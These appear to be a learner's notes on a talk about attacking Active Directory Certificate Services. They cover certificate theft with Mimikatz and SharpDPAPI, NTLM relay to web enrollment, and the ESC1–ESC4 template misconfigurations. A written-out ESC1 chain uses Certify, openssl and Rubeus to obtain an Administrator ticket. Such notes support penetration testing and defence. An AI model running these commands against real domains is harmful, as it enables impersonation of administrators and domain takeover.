https://www.youtube.com/watch?v=ejmAIgxFRgM
Notes:
Find Certificate Authority
Openssl s_client –connect <DC_IP>:636 –showcerts –debug
certipy find –u <username>@<domain>
certutil -dump
Living off the Land, provides a lot of info
Passive Cert Theft
If no hardware protection (TPM/HSM) user/machine private certs are stored with DPAPI. Can be stolen w/ Mimikatz or SharpDPAPI
Active Cert Theft
Users can enroll in any template they have Enroll permissions for.
By default User and Machine templates are available
We want a template that allows AD authentication
To get user’s TGT and NTLM (Rubeus)
Persistently compromises computer through RBCD/S4U2self - can login as computer
Enroll through DCOM(Certify), RPC, and AD CS web endpoints
If you are able to coerce authentication attempts to a device you control (i.e. Responder, mitm6,PetitPotam, etc.), you can use Impacket’s ntlmrelayx to relay those authentication attempts to the CA’s web enrollment endpoint and request a certificate
The User certificate (generally avalable by default) will allow login to the domain
Certify
https://github.com/GhostPack/Certify
C# toolkit released for talk.
Doesn’t touch LSASS
Doesn’t need elevation for user contexts. Do for machine certs.
Works if accounts change passwords and has long lifetime.
Certipy
https://github.com/ly4k/Certipy
Template Misconfigurations
Low priv users need enrollment rights
Security descriptor on the cert template object
Manager approval is disabled
No authorized signatures required
ESC1
Requirements
If a certificate template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set, then the requester can provide ANY domain account as the Subject Alternate Name (SAN) in the certificate request
The certificate can then be used to authenticate as the domain account provided as the SAN
General requirements (above)
PKINIT: Client Auth, Smartcard, Any Purpose
No EKU (i.e., auth allowed)
ENROLLEE_SUPPLIES_SUBJECT flag is set
certify.exe find /vulnerable /ca:dc.some.domain\\some-DC-CA
Finds vulnerable templates
certify.exe request /ca:dc.some.domain\\some-DC-CA /template:ESC1Template/altname:Administrator
Enrolls in vulnerable template. Copy cert into cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v 1.0" -export -out cert.pfx
Convert cert to pfx
Rubeus.exe asktgt /user:Administrator /certificate:Administrator.pfx /password:password /ptt
Use Rubeus to get a tgt with the cert. Password here is the password you put on the pfx file when it was created. Once TGT is granted you can access filesystems, etc. as specified user.
ESC2
General Requirements
No EKU or Any Purpose EKU
Doesn’t allow immediate domain compromise but can create new certs with any EKU
Might be able to attack ADFS, SAML, IPSEC, etc.
ESC3
General requirements plus no enrollment agent restrictions
Certificate request agent EKU
Enrollment right to a template with other requirements
Allows you to request certs on behalf of another party. Complex attack path. See white paper.
ESC4
Vulnerable certificate template access control (edit templates)
Use certipy to modify the template and make it vulnerable to ESC1
ESC5
ESC6
ESC7
ESC8
Others:
Golden Certificates:
With Valid Cert can get User/Machine NTLM hash